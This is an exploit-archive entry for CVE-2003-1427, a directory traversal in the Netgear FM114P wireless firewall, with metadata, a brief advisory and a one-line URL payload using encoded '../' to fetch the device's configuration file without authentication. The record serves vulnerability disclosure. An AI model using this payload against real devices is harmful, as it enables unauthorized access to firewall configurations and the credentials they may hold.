Netgear FM114P Wireless Firewall - File Disclosure

Author: stickler
type: remote
platform: hardware
port: 
date_added: 2003-02-10  
date_updated: 2012-10-25  
verified: 1  
codes: CVE-2003-1427;OSVDB-59549  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22236.txt  

source: https://www.securityfocus.com/bid/6807/info

Netgear FM114P Wireless Firewalls allow directory traversal using escaped character sequences. It is possible for an unauthenticated user to retrieve the firewall's configuration file by escaping from the /upnp/service directory.

http://<ip-or-hostname>:<port>/upnp/service/%2e%2e%2fnetgear.cfg